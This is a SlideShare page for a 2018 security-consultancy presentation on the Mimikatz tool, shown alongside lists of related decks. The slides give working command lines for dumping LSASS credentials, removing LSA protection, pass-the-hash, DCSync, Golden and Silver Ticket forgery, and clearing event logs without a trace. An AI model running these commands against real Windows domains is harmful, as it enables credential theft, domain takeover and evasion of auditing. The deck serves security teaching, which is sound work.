SlideShare une entreprise Scribd logo

Mimikatz

P
prashant3535

Just another presentation on mimikatz

Technologie
1  sur  62
Télécharger pour lire hors ligne
Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Compliance, Protection & Business Confidence 31 August 18 mimikatz A little tool to play with Windows security Prashant Mahajan
31 August 18 https://www.redbubble.com/people/gentilkiwi/portfolio
Answer to the Ultimate Question of Life, the Universe, and Everything 31 August 18 Mimikatz is
31 August 18 Coffee J
31 August 18 Minesweeper J https://twitter.com/M_haggis/status/1032798552517423105
31 August 18 mimikatz https://github.com/gentilkiwi/mimikatz
• Benjamin DELPY, you can contact him on Twitter (@gentilkiwi) or by mail (benjamin [at] gentilkiwi.com) or visit his blog (http://blog.gentilkiwi.com/) • Vincent LE TOUX, a few contributions to mimikatz including the DCSync function in lsadump module, you contact him on Twitter (@mysmartlogon) or by mail (vincent.letoux [at] gmail.com) or visit his website (http://www.mysmartlogon.com) 31 August 18 Authors
Agenda 31 August 18 • sekurlsa::logonpasswords • Just scratching the surface on the capabilities • SekurLSA module • Event module • DCSync • Golden Ticket • Silver Ticket • Skeleton Key • SIDHistory • DCShadow
• After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. • This is meant to facilitate Single Sign-On (SSO) ensuring a user isn’t prompted each time resource access is requested. • The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords to support WDigest and SSP authentication among others. 31 August 18 Credentials in Memory ? ! https://adsecurity.org/?page_id=1821
31 August 18 Credential Data Chart Benjamin Delpy posted an Excel chart on OneDrive (no longer available) http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png
31 August 18 sekurlsa::logonpasswords
31 August 18 Malicious https://twitter.com/gentilkiwi/status/937384097642635264 https://www.virustotal.com/#/file/e46ba4bdd4168a399ee5bc2161a8c918095fa30eb20ac88cac6ab1d6dbea2b4a/detection
31 August 18 EXE / PS1 / DLL https://twitter.com/gentilkiwi/status/887823565046910977 https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords 31 August 18 ProcDump or Task Manager https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
31 August 18 No Debug Privs ? !
31 August 18 No Debug Privs ? ! https://twitter.com/gentilkiwi/status/1032161555964723200 https://twitter.com/gentilkiwi/status/1032270189444911104
The Local Security Authority (LSA), which resides within the Local Security Authority Security Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. This protected process setting for LSA can be configured in Windows 8.1 but is on by default in Windows RT 8.1 and cannot be changed. 31 August 18 RunAsPPL https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-protection-and-management
privilege::debug !processprotect /process:lsass.exe /remove sekurlsa::logonpasswords J 31 August 18 RunAsPPL
31 August 18 SekurLSA module
31 August 18 Pass the Hash sekurlsa::pth /user:da /domain:sos.labs /ntlm:eaabfdbde55b39c1a9b8d6786afd251e /run:powershell.exe
privilege::debug Get Debug Privs J event::drop Patch Events service to avoid new events. event::clear Clear the event log without any log cleared event (1102) being logged. 31 August 18 Event module
31 August 18 LSADump module
31 August 18 SAM
31 August 18 Cache
31 August 18 DCSync lsadump::dcsync /domain:sos.labs /all /csv
31 August 18 kerberos module
31 August 18 https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf
• A Golden Ticket (GT) is a TGT using the KRBTGT NTLM password hash to encrypt and sign. • A GT can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. • Since the GT is an authentication ticket, its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. • The GT contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. 31 August 18 Golden Ticket https://adsecurity.org/?page_id=1821
To summarize, once an attacker gets access to the KRBTGT password NTLM/RC4/AES128/AES256, they can create Golden Tickets (TGT) that can provide access to anything in AD at any time. Mimikatz adds the following groups to the ticket by default: • Domain Users SID: S-1-5-21<DOMAINID>-513 • Domain Admins SID: S-1-5-21<DOMAINID>-512 • Schema Admins SID: S-1-5-21<DOMAINID>-518 • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 31 August 18 Golden Ticket https://adsecurity.org/?page_id=1821
kerberos::golden /user:doesnotexist /domain:sos.labs /id:9999 /sid:S-1-5-21-2872888145-3513486857-3924934394 /krbtgt:99d196d2968eb268cb69529153a48623 /ptt • /user – account to be impersonated or any username • /id – RID of the account to be impersonated. This could be a real account ID, such as the default administrator ID of 500, or a fake ID. • /groups - list of groups to which the account in the ticket will belong • /sids – to insert a SID into the SIDHistory attribute of the account in the ticket • /ptt – Pass the Ticket to load the golden ticket into the current session 31 August 18 Golden Ticket
A Silver Ticket is a TGS (similar to TGT in format) using the AD computer/service account (can be identified by SPN) NTLM password hash to encrypt and sign. Mimikatz adds the following groups to the ticket by default: • Domain Users SID: S-1-5-21<DOMAINID>-513 • Domain Admins SID: S-1-5-21<DOMAINID>-512 • Schema Admins SID: S-1-5-21<DOMAINID>-518 • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 31 August 18 Silver Ticket https://adsecurity.org/?page_id=1821
kerberos::golden /user:user1 /domain:sos.labs /id:1108 /sid:S-1-5-21-2872888145-3513486857-3924934394 /target:dc1.sos.labs /rc4:fbdcd5041c96ddbd82224270b57f11fc /server:http /ptt • /target –the host (SPN value). sos.labs domain has dc1.sos.labs • /service –the name of the service that we will create tickets for (must be a service running as the service account) • /user –the user that the ticket will be created for, and this can be any user account whatsoever, even user accounts that do not exist • /groups - list of groups to which the account in the ticket will belong to. Domain Admins is included by default • /rc4 – NTLM hash of the account or /aes128 /aes256 keys 31 August 18 Silver Ticket
31 August 18 Misc module
31 August 18 DisableCMD
31 August 18 Clip
• Inject Skeleton Key into LSASS process on Domain Controller. • This enables all user authentication to the Skeleton Key patched DC to use a “master password (mimikatz)” (aka Skeleton Keys) as well as their usual password. • Reboot removes the Skeleton Key injection. 31 August 18 Skeleton Key
31 August 18 Security Identifiers (SID) module
31 August 18 SIDHistory
31 August 18 SIDHistory
31 August 18 SIDHistory
Start the mimidrv service Elevate to SYSTEM 31 August 18 DCShadow
31 August 18 DCShadow
Running as SYSTEM 31 August 18 DCShadow
Running as Domain Admin 31 August 18 DCShadow
31 August 18 DCShadow
What can you do ? • Add user to privileged groups such as Domain Admins, Enterprise Admins • Add SIDHistory • Change PrimaryGroupID • Etc 31 August 18 DCShadow
The following permissions on AD Object’s are required: Domain object • DS-Install-Replica (Add/Remove Replica in Domain) • DS-Replication-Manage-Topology (Manage Replication Topology) • DS-Replication-Synchronize (Replication Synchornization) Sites object in the Configuration container • CreateChild and DeleteChild Computer object of the attacker's machine (which is registered as a Fake DC) • WriteProperty Target object (user or computer or ADSPath) • WriteProperty 31 August 18 DCShadow https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1
31 August 18
31 August 18 Privilege module
31 August 18 Crypto Module
mimikatz # privilege::debug Privilege '20' OK mimikatz # crypto::cng "KeyIso" service patched mimikatz # crypto::capi Local CryptoAPI patched mimikatz # crypto::certificates /export * System Store : 'CURRENT_USER' (0x00010000) * Store : 'My' mimikatz # crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE mimikatz # crypto::keys /export 31 August 18
31 August 18 net module
31 August 18 Process module
31 August 18 RPC module
31 August 18 Service module
31 August 18 System Environment Value module
31 August 18 Token manipulation module
31 August 18 Terminal Server module
31 August 18 IIS XML Config module
31 August 18 Data Protection API module
Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Security, it’s all we do. Knowledge, Experience & Trust. Questions?
Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Security, it’s all we do. Knowledge, Experience & Trust. Thank You! © 2002 – 2018 Sense of Security Pty Limited. All rights reserved. Some images used under license from Shutterstock.com or with permission from respective trademark owners. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher.

Recommandé

Active Directory Recon 101
Active Directory Recon 101Active Directory Recon 101
Active Directory Recon 101prashant3535
 
ADRecon - Detection CHCON 2018
ADRecon - Detection CHCON 2018ADRecon - Detection CHCON 2018
ADRecon - Detection CHCON 2018prashant3535
 
ADRecon BH USA 2018 : Arsenal and DEF CON 26 Demo Labs Presentation
ADRecon BH USA 2018 : Arsenal and DEF CON 26 Demo Labs PresentationADRecon BH USA 2018 : Arsenal and DEF CON 26 Demo Labs Presentation
ADRecon BH USA 2018 : Arsenal and DEF CON 26 Demo Labs Presentationprashant3535
 
ADRecon BH ASIA 2018 : Arsenal Presentation
ADRecon BH ASIA 2018 : Arsenal PresentationADRecon BH ASIA 2018 : Arsenal Presentation
ADRecon BH ASIA 2018 : Arsenal Presentationprashant3535
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleGuardicore
 
2014.11 asfws
2014.11 asfws2014.11 asfws
2014.11 asfwsCyber Security Alliance
 
SSL/TLS for Mortals (Devoxx FR 2018)
SSL/TLS for Mortals (Devoxx FR 2018)SSL/TLS for Mortals (Devoxx FR 2018)
SSL/TLS for Mortals (Devoxx FR 2018)Maarten Mulders
 
Plam16 jan
Plam16 janPlam16 jan
Plam16 janJan Lindström
 

Recommandé

Active Directory Recon 101
Active Directory Recon 101Active Directory Recon 101
Active Directory Recon 101prashant3535
 
ADRecon - Detection CHCON 2018
ADRecon - Detection CHCON 2018ADRecon - Detection CHCON 2018
ADRecon - Detection CHCON 2018prashant3535
 
ADRecon BH USA 2018 : Arsenal and DEF CON 26 Demo Labs Presentation
ADRecon BH USA 2018 : Arsenal and DEF CON 26 Demo Labs PresentationADRecon BH USA 2018 : Arsenal and DEF CON 26 Demo Labs Presentation
ADRecon BH USA 2018 : Arsenal and DEF CON 26 Demo Labs Presentationprashant3535
 
ADRecon BH ASIA 2018 : Arsenal Presentation
ADRecon BH ASIA 2018 : Arsenal PresentationADRecon BH ASIA 2018 : Arsenal Presentation
ADRecon BH ASIA 2018 : Arsenal Presentationprashant3535
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleGuardicore
 
2014.11 asfws
2014.11 asfws2014.11 asfws
2014.11 asfwsCyber Security Alliance
 
SSL/TLS for Mortals (Devoxx FR 2018)
SSL/TLS for Mortals (Devoxx FR 2018)SSL/TLS for Mortals (Devoxx FR 2018)
SSL/TLS for Mortals (Devoxx FR 2018)Maarten Mulders
 
Plam16 jan
Plam16 janPlam16 jan
Plam16 janJan Lindström
 
Plam16 jan
Plam16 janPlam16 jan
Plam16 janJan Lindström
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websitesshehab najjar
 
Security and Encryption on iOS
Security and Encryption on iOSSecurity and Encryption on iOS
Security and Encryption on iOSGraham Lee
 
SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)Maarten Mulders
 
iOS Keychain 介紹
iOS Keychain 介紹iOS Keychain 介紹
iOS Keychain 介紹ShengWen Chiou
 
Secure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSecure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSBA Research
 
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur....NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...NETFest
 
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...SecuRing
 
Users' Data Security in iOS Applications
Users' Data Security in iOS ApplicationsUsers' Data Security in iOS Applications
Users' Data Security in iOS ApplicationsStanfy
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
A 2018 practical guide to hacking RFID/NFC
A 2018 practical guide to hacking RFID/NFCA 2018 practical guide to hacking RFID/NFC
A 2018 practical guide to hacking RFID/NFCSlawomir Jasek
 
Cryptography 101 for Java developers
Cryptography 101 for Java developersCryptography 101 for Java developers
Cryptography 101 for Java developersMichel Schudel
 
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...RootedCON
 
Build 2017 - B8101 - Windows 10 identity overview
Build 2017 - B8101 - Windows 10 identity overviewBuild 2017 - B8101 - Windows 10 identity overview
Build 2017 - B8101 - Windows 10 identity overviewWindows Developer
 
More zBang for the zBuck
More zBang for the zBuckMore zBang for the zBuck
More zBang for the zBuckAndy Thompson
 
Azure IoT hub
Azure IoT hubAzure IoT hub
Azure IoT hubBasavaraj Mulaveesala
 
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...Les mécanismes et protocoles d’authentification sans mot de passe avec Window...
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...Microsoft Décideurs IT
 
Security threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossSecurity threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossHibino Hisashi
 
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"Andreas Falk
 
FIWARE Wednesday Webinars - Short Term History within Smart Systems
FIWARE Wednesday Webinars - Short Term History within Smart SystemsFIWARE Wednesday Webinars - Short Term History within Smart Systems
FIWARE Wednesday Webinars - Short Term History within Smart SystemsFIWARE
 
The Future of Sharding
The Future of ShardingThe Future of Sharding
The Future of ShardingEDB
 
In The Middle of Printers –The (In)Security of Pull Printing Solutions
In The Middle of Printers –The (In)Security of Pull Printing SolutionsIn The Middle of Printers –The (In)Security of Pull Printing Solutions
In The Middle of Printers –The (In)Security of Pull Printing SolutionsSecuRing
 

Contenu connexe

Tendances

Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websitesshehab najjar
 
Security and Encryption on iOS
Security and Encryption on iOSSecurity and Encryption on iOS
Security and Encryption on iOSGraham Lee
 
SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)Maarten Mulders
 
Secure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSecure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSBA Research
 
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur....NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...NETFest
 
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...SecuRing
 
Users' Data Security in iOS Applications
Users' Data Security in iOS ApplicationsUsers' Data Security in iOS Applications
Users' Data Security in iOS ApplicationsStanfy
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsSecuRing
 
A 2018 practical guide to hacking RFID/NFC
A 2018 practical guide to hacking RFID/NFCA 2018 practical guide to hacking RFID/NFC
A 2018 practical guide to hacking RFID/NFCSlawomir Jasek
 
Cryptography 101 for Java developers
Cryptography 101 for Java developersCryptography 101 for Java developers
Cryptography 101 for Java developersMichel Schudel
 
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...RootedCON
 
Build 2017 - B8101 - Windows 10 identity overview
Build 2017 - B8101 - Windows 10 identity overviewBuild 2017 - B8101 - Windows 10 identity overview
Build 2017 - B8101 - Windows 10 identity overviewWindows Developer
 
More zBang for the zBuck
More zBang for the zBuckMore zBang for the zBuck
More zBang for the zBuckAndy Thompson
 
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...Les mécanismes et protocoles d’authentification sans mot de passe avec Window...
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...Microsoft Décideurs IT
 
Security threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossSecurity threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossHibino Hisashi
 
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"Andreas Falk
 
FIWARE Wednesday Webinars - Short Term History within Smart Systems
FIWARE Wednesday Webinars - Short Term History within Smart SystemsFIWARE Wednesday Webinars - Short Term History within Smart Systems
FIWARE Wednesday Webinars - Short Term History within Smart SystemsFIWARE
 

Tendances (20)

Plam16 jan
Plam16 janPlam16 jan
Plam16 jan
 
Hacking intranet websites
Hacking intranet websitesHacking intranet websites
Hacking intranet websites
 
Security and Encryption on iOS
Security and Encryption on iOSSecurity and Encryption on iOS
Security and Encryption on iOS
 
SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)
 
iOS Keychain 介紹
iOS Keychain 介紹iOS Keychain 介紹
iOS Keychain 介紹
 
Secure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas FalkSecure development on Kubernetes by Andreas Falk
Secure development on Kubernetes by Andreas Falk
 
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur....NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...
.NET Fest 2019. Eran Stiller. Create Your Own Serverless PKI with .NET & Azur...
 
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...
Outsmarting Smart Contracts - an essential walkthrough a blockchain security ...
 
Users' Data Security in iOS Applications
Users' Data Security in iOS ApplicationsUsers' Data Security in iOS Applications
Users' Data Security in iOS Applications
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
A 2018 practical guide to hacking RFID/NFC
A 2018 practical guide to hacking RFID/NFCA 2018 practical guide to hacking RFID/NFC
A 2018 practical guide to hacking RFID/NFC
 
Cryptography 101 for Java developers
Cryptography 101 for Java developersCryptography 101 for Java developers
Cryptography 101 for Java developers
 
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...
Toni de la Fuente - Automate or die! How to survive to an attack in the Cloud...
 
Build 2017 - B8101 - Windows 10 identity overview
Build 2017 - B8101 - Windows 10 identity overviewBuild 2017 - B8101 - Windows 10 identity overview
Build 2017 - B8101 - Windows 10 identity overview
 
More zBang for the zBuck
More zBang for the zBuckMore zBang for the zBuck
More zBang for the zBuck
 
Azure IoT hub
Azure IoT hubAzure IoT hub
Azure IoT hub
 
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...Les mécanismes et protocoles d’authentification sans mot de passe avec Window...
Les mécanismes et protocoles d’authentification sans mot de passe avec Window...
 
Security threat analysis points for enterprise with oss
Security threat analysis points for enterprise with ossSecurity threat analysis points for enterprise with oss
Security threat analysis points for enterprise with oss
 
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"
AllTheTalks.Online 2020: "Basics of OAuth 2.0 and OpenID Connect"
 
FIWARE Wednesday Webinars - Short Term History within Smart Systems
FIWARE Wednesday Webinars - Short Term History within Smart SystemsFIWARE Wednesday Webinars - Short Term History within Smart Systems
FIWARE Wednesday Webinars - Short Term History within Smart Systems
 

Similaire à Mimikatz

The Future of Sharding
The Future of ShardingThe Future of Sharding
The Future of ShardingEDB
 
In The Middle of Printers –The (In)Security of Pull Printing Solutions
In The Middle of Printers –The (In)Security of Pull Printing SolutionsIn The Middle of Printers –The (In)Security of Pull Printing Solutions
In The Middle of Printers –The (In)Security of Pull Printing SolutionsSecuRing
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
In the Middle of Printers: (In)security of Pull Printing Solutions
In the Middle of Printers: (In)security of Pull Printing SolutionsIn the Middle of Printers: (In)security of Pull Printing Solutions
In the Middle of Printers: (In)security of Pull Printing SolutionsPositive Hack Days
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Sysdig Tokyo Meetup 2018 02-27
Sysdig Tokyo Meetup 2018 02-27Sysdig Tokyo Meetup 2018 02-27
Sysdig Tokyo Meetup 2018 02-27Michael Ducy
 
Build 2017 - B8002 - Introducing Adaptive Cards
Build 2017 - B8002 - Introducing Adaptive CardsBuild 2017 - B8002 - Introducing Adaptive Cards
Build 2017 - B8002 - Introducing Adaptive CardsWindows Developer
 
Intro to Git Devnet-1080 Cisco Live 2018
Intro to Git Devnet-1080 Cisco Live 2018Intro to Git Devnet-1080 Cisco Live 2018
Intro to Git Devnet-1080 Cisco Live 2018Ashley Roach
 
Vulnerable Out of the Box: An Evaluation of Android Carrier Devices
Vulnerable Out of the Box: An Evaluation of Android Carrier DevicesVulnerable Out of the Box: An Evaluation of Android Carrier Devices
Vulnerable Out of the Box: An Evaluation of Android Carrier DevicesPriyanka Aash
 
Full PPT Stack
Full PPT StackFull PPT Stack
Full PPT StackWendi Sapp
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]RootedCON
 
A Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated InformationA Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated Informationijtsrd
 
Chapter 10 cryptography-public encryption
Chapter 10 cryptography-public encryptionChapter 10 cryptography-public encryption
Chapter 10 cryptography-public encryptionSyaiful Ahdan
 
SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...Denis Gundarev
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
Bitcoin developer guide
Bitcoin developer guideBitcoin developer guide
Bitcoin developer guide承翰 蔡
 
What I learned about IoT Security ... and why it's so hard!
What I learned about IoT Security ... and why it's so hard!What I learned about IoT Security ... and why it's so hard!
What I learned about IoT Security ... and why it's so hard!Christoph Engelbert
 
Introduction to BlackBerry 10 NDK for Game Developers.
Introduction to BlackBerry 10 NDK for Game Developers.Introduction to BlackBerry 10 NDK for Game Developers.
Introduction to BlackBerry 10 NDK for Game Developers.ardiri
 

Similaire à Mimikatz (20)

The Future of Sharding
The Future of ShardingThe Future of Sharding
The Future of Sharding
 
In The Middle of Printers –The (In)Security of Pull Printing Solutions
In The Middle of Printers –The (In)Security of Pull Printing SolutionsIn The Middle of Printers –The (In)Security of Pull Printing Solutions
In The Middle of Printers –The (In)Security of Pull Printing Solutions
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
In the Middle of Printers: (In)security of Pull Printing Solutions
In the Middle of Printers: (In)security of Pull Printing SolutionsIn the Middle of Printers: (In)security of Pull Printing Solutions
In the Middle of Printers: (In)security of Pull Printing Solutions
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Sysdig Tokyo Meetup 2018 02-27
Sysdig Tokyo Meetup 2018 02-27Sysdig Tokyo Meetup 2018 02-27
Sysdig Tokyo Meetup 2018 02-27
 
Build 2017 - B8002 - Introducing Adaptive Cards
Build 2017 - B8002 - Introducing Adaptive CardsBuild 2017 - B8002 - Introducing Adaptive Cards
Build 2017 - B8002 - Introducing Adaptive Cards
 
Intro to Git Devnet-1080 Cisco Live 2018
Intro to Git Devnet-1080 Cisco Live 2018Intro to Git Devnet-1080 Cisco Live 2018
Intro to Git Devnet-1080 Cisco Live 2018
 
Vulnerable Out of the Box: An Evaluation of Android Carrier Devices
Vulnerable Out of the Box: An Evaluation of Android Carrier DevicesVulnerable Out of the Box: An Evaluation of Android Carrier Devices
Vulnerable Out of the Box: An Evaluation of Android Carrier Devices
 
ff.pptx
ff.pptxff.pptx
ff.pptx
 
Full PPT Stack
Full PPT StackFull PPT Stack
Full PPT Stack
 
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]
 
Microcontroller part 3
Microcontroller part 3Microcontroller part 3
Microcontroller part 3
 
A Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated InformationA Novel Secure Cloud SAAS Integration for User Authenticated Information
A Novel Secure Cloud SAAS Integration for User Authenticated Information
 
Chapter 10 cryptography-public encryption
Chapter 10 cryptography-public encryptionChapter 10 cryptography-public encryption
Chapter 10 cryptography-public encryption
 
SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...SYN507: Reducing desktop infrastructure management overhead using “old school...
SYN507: Reducing desktop infrastructure management overhead using “old school...
 
Hack any website
Hack any websiteHack any website
Hack any website
 
Bitcoin developer guide
Bitcoin developer guideBitcoin developer guide
Bitcoin developer guide
 
What I learned about IoT Security ... and why it's so hard!
What I learned about IoT Security ... and why it's so hard!What I learned about IoT Security ... and why it's so hard!
What I learned about IoT Security ... and why it's so hard!
 
Introduction to BlackBerry 10 NDK for Game Developers.
Introduction to BlackBerry 10 NDK for Game Developers.Introduction to BlackBerry 10 NDK for Game Developers.
Introduction to BlackBerry 10 NDK for Game Developers.
 

Plus de prashant3535

